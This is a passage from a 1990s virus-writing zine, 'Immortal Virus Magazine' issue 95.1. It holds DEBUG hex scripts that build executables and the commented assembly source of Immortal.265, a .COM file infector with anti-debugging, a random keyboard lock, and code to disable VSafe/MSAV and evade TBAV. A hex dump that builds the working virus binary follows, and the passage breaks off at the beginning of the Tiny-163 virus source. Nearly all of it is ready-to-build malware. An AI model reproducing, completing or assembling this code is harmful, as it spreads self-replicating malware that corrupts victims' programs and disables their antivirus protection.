+E 01A0 E6 D1 E6 8B 1C 8E 44 02 5E 1F C3 2E C7 06 5B 13 
+E 01B0 00 16 2E A3 E3 12 B4 30 CD 21 2E A2 EE 12 2E 8C 
+E 01C0 1E 45 12 B4 52 CD 21 26 8B 47 FE 2E A3 47 12 8E 
+E 01D0 C0 26 A1 01 00 2E A3 49 12 0E 1F B0 01 E8 B5 FF 
+E 01E0 89 1E 31 12 8C 06 33 12 B0 21 E8 A8 FF 89 1E 2D 
+E 01F0 12 8C 06 2F 12 C6 06 50 12 00 BA 23 00 B0 01 E8 
+E 0200 9A 0E 9C 58 0D 00 01 50 E4 21 A2 E5 12 B0 FF E6 
+E 0210 21 9D B4 52 9C FF 1E 2D 12 9C 58 25 FF FE 50 9D 
+E 0220 A0 E5 12 E6 21 1E C5 16 31 12 B0 01 E8 6D 0E 1F 
+E 0230 C4 3E 2D 12 89 3E 35 12 8C 06 37 12 C6 06 4B 12
+E 0240 EA C7 06 4C 12 CC 02 8C 0E 4E 12 E8 6C 0C B8 00
+E 0250 4B 88 26 E2 12 BA 21 00 FF 36 20 00 CD 21 8F 06 
+E 0260 20 00 26 83 45 FC 09 90 8E 06 45 12 8E 1E 45 12 
+E 0270 81 2E 02 00 61 01 8B 2E 02 00 8C DA 2B EA B4 4A 
+E 0280 BB FF FF CD 21 B4 4A CD 21 4A 8E DA 80 3E 00 00 
+E 0290 5A 74 05 2E FE 0E E2 12 2E 80 3E E2 12 00 74 05 
+E 02A0 C6 06 00 00 4D A1 03 00 8B D8 2D 61 01 03 D0 A3 
+E 02B0 03 00 42 8E C2 26 C6 06 00 00 5A 2E FF 36 49 12 
+E 02C0 26 8F 06 01 00 26 C7 06 03 00 60 01 42 8E C2 0E 
+E 02D0 1F B9 00 0B BE FE 15 8B FE FD F3 A5 FC 06 B8 EE 
+E 02E0 01 50 2E 8E 06 45 12 B4 4A 8B DD CD 21 CB E8 C9 
+E 02F0 0B 2E 8C 0E 4E 12 E8 C1 0B 0E 1F C6 06 A2 12 14 
+E 0300 0E 07 BF 52 12 B9 14 00 33 C0 F3 AB A2 EF 12 A1 
+E 0310 45 12 8E C0 26 C5 16 0A 00 8E D8 05 10 00 2E 01 
+E 0320 06 1A 00 2E 80 3E 20 00 00 75 24 FB 2E A1 04 00 
+E 0330 A3 00 01 2E A1 06 00 A3 02 01 2E A1 08 00 A3 04 
+E 0340 01 2E FF 36 45 12 B8 00 01 50 2E A1 E3 12 CB 2E 
+E 0350 01 06 12 00 2E A1 E3 12 2E 8E 16 12 00 2E 8B 26 
+E 0360 14 00 FB 2E FF 2E 18 00 81 FC 00 01 77 02 33 E4 
+E 0370 8B E8 E8 00 00 59 81 E9 75 02 8C C8 BB 10 00 F7
+E 0380 E3 03 C1 83 D2 00 F7 F3 50 B8 AB 00 50 8B C5 CB
+E 0390 30 7C 07 23 4E 04 37 8B 0E 4B 8B 05 3C D5 04 3D 
+E 03A0 11 05 3E 55 05 0F 9B 03 14 CD 03 21 C1 03 27 BF 
+E 03B0 03 11 59 03 12 59 03 4E 9F 04 4F 9F 04 3F A5 0A 
+E 03C0 40 8A 0B 42 90 0A 57 41 0A 48 34 0E 3D 00 4B 75 
+E 03D0 04 2E A2 E2 12 55 8B EC FF 76 06 2E 8F 06 B3 12 
+E 03E0 5D 55 8B EC E8 08 0B E8 D0 0A E8 9A 0A E8 F6 0A 
+E 03F0 E8 B4 0A 53 BB 90 02 2E 3A 27 75 09 2E 8B 5F 01 
+E 0400 87 5E EC FC C3 83 C3 03 81 FB CC 02 72 E9 5B E8 
+E 0410 89 0A E4 21 2E A2 E5 12 B0 FF E6 21 2E C6 06 51 
+E 0420 12 04 2E C6 06 50 12 01 E8 F1 0A E8 A5 0A 50 2E 
+E 0430 A1 B3 12 0D 00 01 50 9D 58 5D 2E FF 2E 35 12 E8 
+E 0440 AD 0A E8 56 0A E8 72 0A E8 9B 0A 5D 55 8B EC 2E 
+E 0450 FF 36 B3 12 8F 46 06 5D CF E8 77 0A E8 35 0B 0A 
+E 0460 C0 75 DC E8 41 0A E8 18 02 B0 00 80 3F FF 75 06 
+E 0470 8A 47 06 83 C3 07 2E 20 06 F0 12 F6 47 1A 80 74 
+E 0480 15 80 6F 1A C8 2E 80 3E F0 12 00 75 09 81 6F 1D 
+E 0490 00 10 83 5F 1F 00 E8 3A 0A EB A4 E8 35 0A E8 F3 
+E 04A0 0A E8 03 0A 0A C0 75 EE 8B DA F6 47 15 80 74 E6 
+E 04B0 80 6F 15 C8 81 6F 10 00 10 80 5F 12 00 EB D7 E3
+E 04C0 1B 8B DA 8B 77 21 0B 77 23 75 11 EB 0A 8B DA 8B
+E 04D0 47 0C 0A 47 20 75 05 E8 3F 05 73 03 E9 30 FF E8 
+E 04E0 F1 09 E8 C2 09 E8 AC 0A 89 46 FC 89 4E F8 1E 52 
+E 04F0 E8 8E 01 83 7F 14 01 74 0F 8B 07 03 47 02 03 47 
+E 0500 04 74 05 83 C4 04 EB 8E 5A 1F 8B F2 0E 07 BF B5 
+E 0510 12 B9 25 00 F3 A4 BF B5 12 0E 1F 8B 45 10 8B 55 
+E 0520 12 05 0F 10 83 D2 00 25 F0 FF 89 45 10 89 55 12 
+E 0530 2D FC 0F 83 DA 00 89 45 21 89 55 23 C7 45 0E 01 
+E 0540 00 B9 1C 00 8B D7 B4 27 E8 49 0A E9 48 FF 0E 07 
+E 0550 8B F2 BF B5 12 B9 25 00 F3 A4 1E 52 0E 1F BA B5 
+E 0560 12 B4 0F E8 2E 0A B4 10 E8 29 0A F6 06 CA 12 80 
+E 0570 5E 1F 74 7E 2E C4 1E C5 12 8C C0 81 EB 00 10 1D 
+E 0580 00 00 33 D2 2E 8B 0E C3 12 49 03 D9 15 00 00 41 
+E 0590 F7 F1 89 44 23 92 93 F7 F1 89 44 21 E9 F7 FE 2E 
+E 05A0 83 26 B3 12 FE E8 2B 09 E8 E9 09 E8 F9 08 73 09 
+E 05B0 2E 83 0E B3 12 01 E9 DD FE E8 C5 00 F6 47 19 80 
+E 05C0 75 03 E9 D1 FE 81 6F 1A 00 10 83 5F 1C 00 80 6F 
+E 05D0 19 C8 E9 C1 FE 51 83 E1 07 83 F9 07 74 2F 59 E8 
+E 05E0 E4 07 E8 AF 09 E8 84 08 9C 2E 80 3E DA 12 00 74 
+E 05F0 04 9D E9 1A FE 9D 72 09 8B D8 B4 3E E8 95 09 EB
+E 0600 10 2E 80 0E B3 12 01 89 46 FC E9 89 FE 59 E9 FE
+E 0610 FD E8 5D 04 E8 0E 04 72 39 2E 80 3E A2 12 00 74 
+E 0620 31 E8 5A 04 83 FB FF 74 29 2E FE 0E A2 12 0E 07 
+E 0630 BF 52 12 B9 14 00 33 C0 F2 AF 2E A1 A3 12 26 89 
+E 0640 45 FE 26 89 5D 26 89 5E FC 2E 80 26 B3 12 FE E9 
+E 0650 44 FE E9 BA FD 0E 07 E8 17 04 BF 52 12 B9 14 00 
+E 0660 2E A1 A3 12 F2 AF 75 16 26 3B 5D 26 75 F6 26 C7 
+E 0670 45 FE 00 00 E8 1C 02 2E FE 06 A2 12 EB CB E9 8E 
+E 0680 FD 06 B4 2F E8 0D 09 06 1F 07 C3 0A C0 74 03 E9 
+E 0690 4E 01 1E 52 2E 89 1E 24 12 2E 8C 06 26 12 2E C5 
+E 06A0 36 24 12 BF F1 12 B9 0E 00 0E 07 F3 A4 5E 1F BF 
+E 06B0 07 13 B9 50 00 F3 A4 BB FF FF E8 7D 08 E8 13 08 
+E 06C0 5D 2E 8F 06 E6 12 2E 8F 06 E8 12 2E 8F 06 B3 12 
+E 06D0 B8 01 4B 0E 07 BB F1 12 9C 2E FF 1E 35 12 73 20 
+E 06E0 2E 83 0E B3 12 01 2E FF 36 B3 12 2E FF 36 E8 12 
+E 06F0 2E FF 36 E6 12 55 8B EC 2E C4 1E 24 12 E9 3F FD 
+E 0700 E8 6E 03 0E 07 BF 52 12 B9 14 00 2E A1 A3 12 F2 
+E 0710 AF 75 0D 26 C7 45 FE 00 00 2E FE 06 A2 12 EB EB 
+E 0720 2E C5 36 03 13 83 FE 01 75 33 8B 16 1A 00 83 C2 
+E 0730 10 B4 51 E8 5E 08 03 D3 2E 89 16 05 13 FF 36 18
+E 0740 00 2E 8F 06 03 13 83 C3 10 03 1E 12 00 2E 89 1E
+E 0750 01 13 FF 36 14 00 2E 8F 06 FF 12 EB 22 8B 04 03 
+E 0760 44 02 03 44 04 74 60 0E 1F BA 07 13 E8 B6 02 E8 
+E 0770 0C 03 2E FE 06 EF 12 E8 19 01 2E FE 0E EF 12 B4 
+E 0780 51 E8 10 08 E8 68 07 E8 11 07 E8 2D 07 E8 56 07 
+E 0790 8E DB 8E C3 2E FF 36 B3 12 2E FF 36 E8 12 2E FF 
+E 07A0 36 E6 12 8F 06 0A 00 8F 06 0C 00 1E C5 16 0A 00 
+E 07B0 B0 22 E8 E7 08 1F 9D 58 2E 8E 16 01 13 2E 8B 26 
+E 07C0 FF 12 2E FF 2E 03 13 8B 5C 01 8B 80 9F FD 89 04 
+E 07D0 8B 80 A1 FD 89 44 02 8B 80 A3 FD 89 44 04 EB 9F 
+E 07E0 3C 01 74 03 E9 28 FC 2E 83 0E B3 12 01 2E 89 1E 
+E 07F0 24 12 2E 8C 06 26 12 E8 D9 06 E8 97 07 E8 A7 06 
+E 0800 2E C4 1E 24 12 26 C5 77 12 72 6E 2E 80 26 B3 12 
+E 0810 FE 83 FE 01 74 23 8B 04 03 44 02 03 44 04 75 45 
+E 0820 8B 5C 01 8B 80 9F FD 89 04 8B 80 A1 FD 89 44 02 
+E 0830 8B 80 A3 FD 89 44 04 EB 2C 8B 16 1A 00 E8 31 02 
+E 0840 2E 8B 0E A3 12 83 C1 10 03 D1 26 89 57 14 A1 18 
+E 0850 00 26 89 47 12 A1 12 00 03 C1 26 89 47 10 A1 14 
+E 0860 00 26 89 47 0E E8 09 02 2E 8E 1E A3 12 8B 46 02 
+E 0870 A3 0A 00 8B 46 04 A3 0C 00 E9 1A FC 2E C6 06 F0
+E 0880 12 00 B4 2A E8 0D 07 81 FA 16 09 72 03 E8 22 08
+E 0890 E9 7C FB E8 30 05 E8 BC 00 C6 06 20 00 01 81 3E 
+E 08A0 00 12 4D 5A 74 0E 81 3E 00 12 5A 4D 74 06 FE 0E 
+E 08B0 20 00 74 58 A1 04 12 D1 E1 F7 E1 05 00 02 3B C6 
+E 08C0 72 48 A1 0A 12 0B 06 0C 12 74 3F A1 A9 12 8B 16 
+E 08D0 AB 12 B9 00 02 F7 F1 0B D2 74 01 40 A3 04 12 89 
+E 08E0 16 02 12 83 3E 14 12 01 74 62 C7 06 14 12 01 00 
+E 08F0 8B C6 2B 06 08 12 A3 16 12 83 06 04 12 08 A3 0E 
+E 0900 12 C7 06 10 12 00 10 E8 A9 00 EB 40 81 FE 00 0F 
+E 0910 73 3A A1 00 12 A3 04 00 03 D0 A1 02 12 A3 06 00 
+E 0920 03 D0 A1 04 12 A3 08 00 03 D0 74 20 B1 E9 88 0E 
+E 0930 00 12 B8 10 00 F7 E6 05 65 02 A3 01 12 A1 00 12 
+E 0940 03 06 02 12 F7 D8 A3 04 12 E8 67 00 B4 3E E8 43 
+E 0950 06 E8 18 05 C3 0E 1F B8 00 57 E8 37 06 89 0E 29 
+E 0960 12 89 16 2B 12 B8 00 42 33 C9 8B D1 E8 25 06 B4 
+E 0970 3F B1 1C BA 00 12 E8 1B 06 B8 00 42 33 C9 8B D1 
+E 0980 E8 11 06 B4 3F B1 1C BA 04 00 E8 07 06 B8 02 42 
+E 0990 33 C9 8B D1 E8 FD 05 A3 A9 12 89 16 AB 12 8B F8 
+E 09A0 05 0F 00 83 D2 00 25 F0 FF 2B F8 B9 10 00 F7 F1 
+E 09B0 8B F0 C3 B8 00 42 33 C9 8B D1 E8 D7 05 B4 40 B1
+E 09C0 1C BA 00 12 E8 CD 05 B8 10 00 F7 E6 8B CA 8B D0
+E 09D0 B8 00 42 E8 BE 05 33 D2 B9 00 10 03 CF B4 40 E8 
+E 09E0 B2 05 B8 01 57 8B 0E 29 12 8B 16 2B 12 F6 C6 80 
+E 09F0 75 03 80 C6 C8 E8 9C 05 80 3E EE 12 03 72 19 80 
+E 0A00 3E EF 12 00 74 12 53 8A 16 28 12 B4 32 E8 84 05 
+E 0A10 2E A1 EC 12 89 47 1E 5B C3 E8 D3 04 8B FA 83 C7 
+E 0A20 0D 1E 07 EB 20 E8 C7 04 1E 07 8B FA B9 50 00 33 
+E 0A30 C0 B3 00 80 7D 01 3A 75 05 8A 1D 80 E3 1F 2E 88 
+E 0A40 1E 28 12 F2 AE 8B 45 FD 25 DF DF 02 E0 8A 45 FC 
+E 0A50 24 DF 02 C4 2E C6 06 20 00 00 3C DF 74 09 2E FE 
+E 0A60 06 20 00 3C E2 75 05 E8 7C 04 F8 C3 E8 77 04 F9 
+E 0A70 C3 53 B4 51 E8 1D 05 2E 89 1E A3 12 5B C3 E8 45 
+E 0A80 03 52 2E 8A 16 28 12 B4 36 E8 08 05 F7 E1 F7 E3 
+E 0A90 8B DA 5A 0B DB 75 05 3D 00 40 72 43 B8 00 43 E8 
+E 0AA0 F2 04 72 3B 8B F9 33 C9 B8 01 43 E8 E6 04 2E 80 
+E 0AB0 3E DA 12 00 75 29 B8 02 3D E8 D8 04 72 21 8B D8 
+E 0AC0 8B CF B8 01 43 E8 CC 04 53 2E 8A 16 28 12 B4 32 
+E 0AD0 E8 C1 04 8B 47 1E 2E A3 EC 12 5B E8 8E 03 C3 33 
+E 0AE0 DB 4B E8 87 03 C3 51 52 50 B8 00 44 E8 A5 04 80 
+E 0AF0 F2 80 F6 C2 80 74 09 B8 00 57 E8 97 04 F6 C6 80
+E 0B00 58 5A 59 C3 E8 E8 03 B8 01 42 33 C9 33 D2 E8 83
+E 0B10 04 2E A3 A5 12 2E 89 16 A7 12 B8 02 42 33 C9 33 
+E 0B20 D2 E8 70 04 2E A3 A9 12 2E 89 16 AB 12 B8 00 42 
+E 0B30 2E 8B 16 A5 12 2E 8B 0E A7 12 E8 57 04 E8 A6 03 
+E 0B40 C3 0A C0 75 22 2E 83 26 B3 12 FE E8 85 03 E8 43 
+E 0B50 04 72 0B F6 C6 80 74 03 80 EE C8 E9 E1 F8 2E 83 
+E 0B60 0E B3 12 01 E9 D8 F8 3C 01 75 37 2E 83 26 B3 12 
+E 0B70 FE F6 C6 80 74 03 80 EE C8 E8 6A FF 74 03 80 C6 
+E 0B80 C8 E8 10 04 89 46 FC 2E 83 16 B3 12 00 E9 06 F9 
+E 0B90 3C 02 75 0E E8 4F FF 74 09 81 6E F6 00 10 83 5E 
+E 0BA0 F8 00 E9 6A F8 2E 80 26 B3 12 FE E8 38 FF 74 F2 
+E 0BB0 2E 89 0E AF 12 2E 89 16 AD 12 2E C7 06 B1 12 00 
+E 0BC0 00 E8 40 FF 2E A1 A9 12 2E 8B 16 AB 12 2D 00 10 
+E 0BD0 83 DA 00 2E 2B 06 A5 12 2E 1B 16 A7 12 79 08 C7 
+E 0BE0 46 FC 00 00 E9 62 FA 75 08 3B C1 77 04 2E A3 AF 
+E 0BF0 12 2E 8B 16 A5 12 2E 8B 0E A7 12 0B C9 75 05 83 
+E 0C00 FA 1C 76 1A 2E 8B 16 AD 12 2E 8B 0E AF 12 B4 3F 
+E 0C10 E8 81 03 2E 03 06 B1 12 89 46 FC E9 78 F8 8B F2 
+E 0C20 8B FA 2E 03 3E AF 12 83 FF 1C 72 04 33 FF EB 05 
+E 0C30 83 EF 1C F7 DF 8B C2 2E 8B 0E AB 12 2E 8B 16 A9
+E 0C40 12 83 C2 0F 83 D1 00 83 E2 F0 81 EA FC 0F 83 D9
+E 0C50 00 03 D0 83 D1 00 B8 00 42 E8 38 03 B9 1C 00 2B 
+E 0C60 CF 2B CE B4 3F 2E 8B 16 AD 12 E8 27 03 2E 01 06 
+E 0C70 AD 12 2E 29 06 AF 12 2E 01 06 B1 12 33 C9 BA 1C 
+E 0C80 00 B8 00 42 E8 0D 03 E9 7A FF 2E 80 26 B3 12 FE 
+E 0C90 E8 53 FE 75 03 E9 0A FF 2E 89 0E AF 12 2E 89 16 
+E 0CA0 AD 12 2E C7 06 B1 12 00 00 E8 58 FE 2E A1 A9 12 
+E 0CB0 2E 8B 16 AB 12 2D 00 10 83 DA 00 2E 2B 06 A5 12 
+E 0CC0 2E 1B 16 A7 12 78 02 EB 7E E8 FA 00 0E 1F 8B 16 
+E 0CD0 A9 12 8B 0E AB 12 83 C2 0F 83 D1 00 83 E2 F0 81 
+E 0CE0 EA FC 0F 83 D9 00 B8 00 42 E8 A8 02 BA 04 00 B9 
+E 0CF0 1C 00 B4 3F E8 9D 02 B8 00 42 33 C9 8B D1 E8 93 
+E 0D00 02 BA 04 00 B9 1C 00 B4 40 E8 88 02 BA 00 F0 B9 
+E 0D10 FF FF B8 02 42 E8 7C 02 B4 40 33 C9 E8 75 02 8B 
+E 0D20 16 A5 12 8B 0E A7 12 B8 00 42 E8 67 02 B8 00 57 
+E 0D30 E8 61 02 F6 C6 80 74 09 80 EE C8 B8 01 57 E8 53 
+E 0D40 02 E8 28 01 E9 C8 F6 75 07 3B C1 77 03 E9 79 FF 
+E 0D50 2E 8B 16 A5 12 2E 8B 0E A7 12 0B C9 75 08 83 FA 
+E 0D60 1C 77 03 E9 63 FF E8 6A 01 E8 28 02 E8 38 01 B8 
+E 0D70 00 57 E8 1F 02 F6 C6 80 75 09 80 C6 C8 B8 01 57
+E 0D80 E8 11 02 E9 10 F7 E9 86 F6 2E 8F 06 41 12 2E 8F
+E 0D90 06 43 12 2E 8F 06 DB 12 2E 83 26 DB 12 FE 2E 80 
+E 0DA0 3E DA 12 00 75 11 2E FF 36 DB 12 2E FF 1E 2D 12 
+E 0DB0 73 06 2E FE 06 DA 12 F9 2E FF 2E 41 12 32 C0 2E 
+E 0DC0 C6 06 DA 12 01 CF 2E C6 06 DA 12 00 E8 20 01 0E 
+E 0DD0 1F B0 13 E8 BF F3 89 1E 2D 12 8C 06 2F 12 89 1E 
+E 0DE0 39 12 8C 06 3B 12 B2 00 B0 0D E8 A8 F3 8C C0 3D 
+E 0DF0 00 C0 73 02 B2 02 B0 0E E8 9A F3 8C C0 3D 00 C0 
+E 0E00 73 02 B2 02 88 16 50 12 E8 11 01 8C 16 DD 12 89 
+E 0E10 26 DF 12 0E B8 40 0D 50 B8 70 00 8E C0 B9 FF FF 
+E 0E20 B0 CB 33 FF F2 AE 4F 9C 06 57 9C 58 80 CC 01 50 
+E 0E30 E4 21 A2 E5 12 B0 FF E6 21 9D 33 C0 FF 2E 2D 12 
+E 0E40 C5 16 31 12 B0 01 E8 53 02 0E 1F BA 89 0C B0 13 
+E 0E50 E8 49 02 B0 24 E8 3D F3 89 1E 3D 12 8C 06 3F 12 
+E 0E60 BA BD 0C B0 24 E8 34 02 E8 7B 00 C3 E8 80 00 2E 
+E 0E70 C5 16 39 12 B0 13 E8 23 02 2E C5 16 3D 12 B0 24 
+E 0E80 E8 19 02 E8 60 00 C3 B8 00 33 E8 07 01 2E 88 16 
+E 0E90 E1 12 B8 01 33 32 D2 E8 FA 00 C3 2E 8A 16 E1 12 
+E 0EA0 B8 01 33 E8 EE 00 C3 2E 8F 06 EA 12 9C 50 53 51 
+E 0EB0 52 56 57 1E 06 2E FF 26 EA 12 2E C4 3E 35 12 BE
+E 0EC0 4B 12 0E 1F FC B9 05 00 AC 26 86 05 88 44 FF 47
+E 0ED0 E2 F6 C3 2E 8F 06 EA 12 07 1F 5F 5E 5A 59 5B 58 
+E 0EE0 9D 2E FF 26 EA 12 2E C7 06 5D 13 D3 0D EB 07 2E 
+E 0EF0 C7 06 5D 13 A7 0D 2E 8C 16 59 13 2E 89 26 57 13 
+E 0F00 0E 17 2E 8B 26 5B 13 2E FF 16 5D 13 2E 89 26 5B 
+E 0F10 13 2E 8E 16 59 13 2E 8B 26 57 13 C3 B0 01 E8 74 
+E 0F20 F2 2E 89 1E 31 12 2E 8C 06 33 12 0E 1F BA 23 00 
+E 0F30 E8 69 01 C3 E8 03 00 E9 D5 F4 2E 80 3E E2 12 00 
+E 0F40 74 48 83 FB FF 75 43 BB 60 01 E8 47 00 72 3B 8C 
+E 0F50 CA 3B C2 72 09 8E C0 B4 49 E8 38 00 EB 2C 4A 8E 
+E 0F60 DA C7 06 01 00 00 00 42 8E DA 8E C0 50 2E A3 4E 
+E 0F70 12 33 F6 8B FE B9 00 0B F3 A5 48 8E C0 2E A1 49 
+E 0F80 12 26 A3 01 00 B8 8A 0E 50 CB C3 2E C6 06 F0 12 
+E 0F90 02 E9 7B F4 9C 2E FF 1E 35 12 C3 FA 33 C0 8E D0 
+E 0FA0 BC 00 7C EB 4F DB DB DB 20 F9 E0 E3 C3 80 81 11 
+E 0FB0 12 24 40 81 11 12 24 40 F1 F1 12 24 40 81 21 12 
+E 0FC0 24 40 81 10 E3 C3 80 00 00 00 00 00 00 00 00 00 
+E 0FD0 00 82 44 F8 70 C0 82 44 80 88 C0 82 44 80 80 C0 
+E 0FE0 82 44 F0 70 C0 82 28 80 08 C0 82 28 80 88 00 F2 
+E 0FF0 10 F8 70 C0 0E 1F BA 00 B0 B4 0F CD 10 3C 07 74
+E 1000 03 BA 00 B8 8E C2 FC 33 FF B9 D0 07 B8 20 07 F3
+E 1010 AB BE 0E 7C BB AE 02 BD 05 00 8B FB AC 8A F0 B9
+E 1020 08 00 B8 20 07 D1 E2 73 02 B0 DB AB E2 F4 4D 75 
+E 1030 EB 81 C3 A0 00 81 FE 59 7C 72 DC B4 01 CD 10 B0 
+E 1040 08 BA B9 7C E8 55 00 B8 FE 07 E6 21 FB 33 DB B9 
+E 1050 01 00 EB FE 49 75 0B 33 FF 43 E8 0A 00 E8 07 00 
+E 1060 B1 04 B0 20 E6 20 CF B9 28 00 E8 26 00 AB AB E2 
+E 1070 F9 81 C7 9E 00 B9 17 00 E8 18 00 AB 81 C7 9E 00 
+E 1080 E2 F6 FD 80 36 E7 7C 01 80 36 D7 7C 28 80 36 E2 
+E 1090 7C 28 C3 83 E3 03 8A 87 0A 7C 43 C3 06 53 33 DB 
+E 10A0 8E C3 8A D8 D1 E3 D1 E3 26 89 17 26 8C 5F 02 5B 
+E 10B0 07 C3 E8 11 FD B2 80 E8 08 00 32 D2 E8 03 01 00 
+E 10C0 9A 0E 32 08 70 00 33 0E 2E 03 6C 15 03 00 26 00 
+E 10D0 00 00 21 00 50 12 65 14 82 08 00 0C 9A 0E 56 07 
+E 10E0 70 00 33 0E 2E 03 6C 15 E2 0C 1E 93 00 00 E2 0C 
+E 10F0 50 E9 68 02 
+RCX
+0FF4
+W
+Q
+-------------------------------------<CUT>-------------------------------------
+By: [Hacking Hell]------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+----------------------------------Immortal.265---------------------------------
+
+This is our real self made virus, we created another before, but that was
+ a modified version of RIOT.144 (Tnx Immortal RIOT!).
+
+Immortal.265 is a 265 byte virus, non-tsr, appending, .COM infector,
+ with anti-trace, 13% chance on a keyboard lock, Anti-TBAV, VSafe takedown,
+ 50% chance on a mezzie, 5 infections per run, non-encrypting, not traversal.
+
+ Compile with A86 or TASM/TLINK!
+
+-------------------------------------<CUT>-------------------------------------
+%OUT iMMoRTaL.265 virus by Immortal EAS.
+%OUT Little parasatic non-tsr appending virus. Features:
+%OUT  + Anti-tracing meganism
+%OUT  + 13% chance on a keyboard lock
+%OUT  + 50% chance on a little message
+%OUT  + Quick spreading routine, 5 infects per run
+%OUT AV Fool techniques:
+%OUT  + VSafe takedown  (!!)
+%OUT  + Simple but working version to get Delta Offset  ("E?!?")
+%OUT  + Z.COM filespec will be changed to *.COM  ("S")
+%OUT  + "F" simply does not appear (!?!)
+%OUT btw. TBAV heuristic scan "G" disappears after infection!?!
+
+.model  tiny
+.code
+	
+	ORG     100h                    ;COM file remember?!?
+
+start:  push    bx                      ;Some junk to fool TBAV
+	pop     ax
+
+	mov     ax,0fa01h               ;Let's take down MSAV!!!
+	mov     dx,05945h
+	int     16h
+	
+	call    getdlt                  ;Nice way to get delta offset!
+realst:
+getdlt: pop     bp
+	sub     bp, offset getdlt
+
+codest: lea     si,[orgbts+bp]          ;Restore first 4 bytes        
+	mov     di,0100h
+	movsw
+	movsw
+	
+	push    cs                      ;DS <==> CS
+	pop     ds
+
+	lea     dx,[eov+bp]             ;Set DTA address
+	mov     ah,1ah
+	int     21h
+	
+	mov     al,01h                  ;Detect INT 1 trace...
+	mov     ah,35h
+	int     21h
+	push    es
+	pop     ax
+	cmp     ax,70h                  ;Default segment INT 1 & 3
+	jne     lockkb
+	
+	mov     al,03h                  ;Detect INT 3 trace...
+	mov     ah,35h
+	int     21h
+	push    es
+	pop     ax
+	cmp     ax,70h                  ;Default segment INT 1 & 3
+	jne     lockkb
+
+	mov     ah,2ch                  ;13% chance to lock keyboard!
+	int     21h
+	cmp     dl, 0dh
+	jg      nolock
+
+lockkb: mov     al,82h                  ;Actual keyboard lock!
+	out     21h,al
+	
+nolock: mov     ah,2ch                  ;50% chance to print message!
+	int     21h
+	cmp     dl,32h
+	jl      spread
+
+	mov     ah,09h                  ;Bingo! print message!
+	lea     dx, [bp+offset welcome]
+	int     21h
+	mov     ah,00h                  ;Wait for a key!
+	int     16h
+	jmp     spread
+
+welcome db 'iMMoRTaL.263!!',07h,0ah,0dh,'$';Ever seen a DB in the middle of a file?
+
+spread: mov     ah,4eh                  ;Findfirst
+	lea     dx,[fspec+bp]           ;Filespec=*.COM
+
+	mov     byte ptr [infcnt+bp],0
+fnext:  add     byte ptr [infcnt+bp],1
+	cmp     byte ptr [infcnt+bp],6
+	je      re_dta
+
+	mov     byte ptr [fspec+bp],'*'
+	int     21h
+	jc      re_dta                  ;No files found
+	mov     byte ptr [fspec+bp],'z'
+	lea     dx,[eov+1eh+bp]         ;Open file
+	mov     ax,3d02h
+	int     21h
+
+	jc      nextf                   ;Error opening file, next!
+
+	xchg    bx,ax
+
+	mov     cx,0004h                ;Read first 4 bytes for check
+	mov     ah,3fh                  ; if already infected!
+	lea     dx,[orgbts+bp]
+	int     21h
+
+	cmp     byte ptr [orgbts+bp+3],'I' ;Already infected
+	jz      shutit
+
+	mov     ax,4202h                ;Goto eof
+	sub     cx,cx                   ;2 byte version of mov cx,0!!
+	cwd                             ;1 byte version of mov dx,0!!
+	int     21h
+
+	sub     ax,0003h                ;Use our jmp table
+	mov     word ptr [bp+jmptbl+1],ax
+
+	mov     ah,40h                  ;Implend our viral code into victim
+	mov     cx,eov-start
+	lea     dx,[bp+start]
+	int     21h
+
+	mov     ax,4200h                ;Goto SOF
+	sub     cx,cx
+	cwd
+	int     21h
+
+	mov     ah,40h                  ;Write first four bytes over
+	mov     cx,0004h                ; the original
+	lea     dx,[bp+jmptbl]
+	int     21h
+
+shutit: mov     ah,3eh                  ;Close victim
+	int     21h
+
+nextf:  mov     ah,4fh                  ;Find next file
+	jmp     fnext
+
+re_dta: mov     ah,1ah                  ;Reset DTA
+	mov     dx,0080h
+	int     21h
+
+	mov     di,0100h                ;Return control to original file!
+	push    di
+	ret
+
+
+fspec   db      'z.com',0
+infcnt  db      0
+jmptbl  db      0e9h,00h,00h,'I'
+orgbts: db      90h,90h,90h,90h
+eov:
+end     start
+-------------------------------------<CUT>-------------------------------------
+N IMM-265.COM
+E 0100 E9 02 00 49 C3 53 58 B8 01 FA BA 45 59 CD 16 E8
+E 0110 00 00 5D 81 ED 0D 01 8D B6 05 02 BF 00 01 A5 A5
+E 0120 0E 1F 8D 96 09 02 B4 1A CD 21 B0 01 B4 35 CD 21
+E 0130 06 58 3D 70 00 75 16 B0 03 B4 35 CD 21 06 58 3D 
+E 0140 70 00 75 09 B4 2C CD 21 80 FA 0D 7F 04 B0 82 E6 
+E 0150 21 B4 2C CD 21 80 FA 32 7C 21 B4 09 8D 96 64 01 
+E 0160 CD 21 B4 00 CD 16 EB 13 90 69 4D 4D 6F 52 54 61 
+E 0170 4C 2E 32 36 33 21 21 07 0A 0D 24 B4 4E 8D 96 FA 
+E 0180 01 C6 86 00 02 00 80 86 00 02 01 80 BE 00 02 06 
+E 0190 74 61 C6 86 FA 01 2A CD 21 72 58 C6 86 FA 01 7A 
+E 01A0 8D 96 27 02 B8 02 3D CD 21 72 44 93 B9 04 00 B4 
+E 01B0 3F 8D 96 05 02 CD 21 80 BE 08 02 49 74 2D B8 02 
+E 01C0 42 2B C9 99 CD 21 2D 03 00 89 86 02 02 B4 40 B9
+E 01D0 09 01 8D 96 00 01 CD 21 B8 00 42 2B C9 99 CD 21 
+E 01E0 B4 40 B9 04 00 8D 96 01 02 CD 21 B4 3E CD 21 B4 
+E 01F0 4F EB 93 B4 1A BA 80 00 CD 21 BF 00 01 57 C3 7A 
+E 0200 2E 63 6F 6D 00 00 E9 00 00 49 90 90 90 90 
+RCX
+010E
+W
+Q
+-------------------------------------<CUT>-------------------------------------
+By: [Hacking Hell]!------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+------------------------------------Tiny-163-----------------------------------
+
+This is a very old virus, it also is very small and very easy to detect,
+ it is .COM infector, non-encrypting, non-tsr, non-payloaded, in fact,
+ it does nothing but infecting, I think it's somebodies first virus or
+ something.
+
+ Compile with A86 or TASM/TLINK!
+
+-------------------------------------<CUT>-------------------------------------
+.Model Tiny
+.Code
+
+data_2e         equ     1ABh                    ;start of virus
+
+seg_a           segment byte public             ;
+                assume  cs:seg_a, ds:seg_a      ;assume cs, ds - code
+
+
+                org     100h                    ;orgin of all COM files
+s               proc    far
+
+start:
+                jmp     loc_1                   ;jump to virus
+
+
+;this is a replacement for an infected file
+
